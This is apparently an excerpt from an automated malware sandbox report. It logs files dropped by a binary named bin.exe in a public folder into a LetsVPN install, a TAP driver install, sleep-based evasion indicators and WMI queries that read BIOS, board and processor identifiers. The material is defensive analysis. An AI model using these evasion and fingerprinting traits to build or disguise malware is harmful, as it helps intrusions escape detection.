                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ValueTuple.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.NetTcp.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.IsolatedStorage.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Drawing.Common.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TraceSource.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\ToastNotifications.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NameResolution.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.core.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Console.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Overlapped.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Writer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Contracts.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tools.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Buffers.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Reader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Numerics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlSerializer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Configuration.ConfigurationManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\ICSharpCode.AvalonEdit.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.batteries_v2.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Queryable.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.TypeConverter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\x86\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Duplex.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.XDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Parallel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Sockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.SqlClient.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Timer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ObjectModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Ping.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\netstandard.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Odbc.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.ThreadPool.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Dynamic.Runtime.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Process.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.ZipFile.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\NuGet.Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Ports.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Permissions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Common.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB17.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SharpCompress.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Syndication.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.Windows.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\SETF101.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Analytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Csp.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.Annotations.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\x64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Numerics.Vectors.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.SecureString.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.PerformanceCounter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Expressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Formatters.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\microsoft.identitymodel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\CommunityToolkit.Mvvm.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsDialogs.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.AppContext.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\SETE887.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Specialized.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NetworkInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNInfraStructure.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\MdXaml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Memory.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.EventLog.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\arm64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.nativelibrary.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Management.Automation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\WebSocket4Net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLite-net.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.ResourceManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsProcess.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.ProtectedData.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Debug.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Core.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.NonGeneric.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Pipes.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.StackTrace.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.ReaderWriter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.RegularExpressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeDropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.2\System.CodeDom.dllJump to dropped file
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeAPI coverage: 4.1 %
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeAPI coverage: 7.6 %
                Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 3694 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 2176 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 5924Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 3860Thread sleep time: -30000s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6208Thread sleep time: -220145s >= -30000s
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe TID: 6252Thread sleep time: -300000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
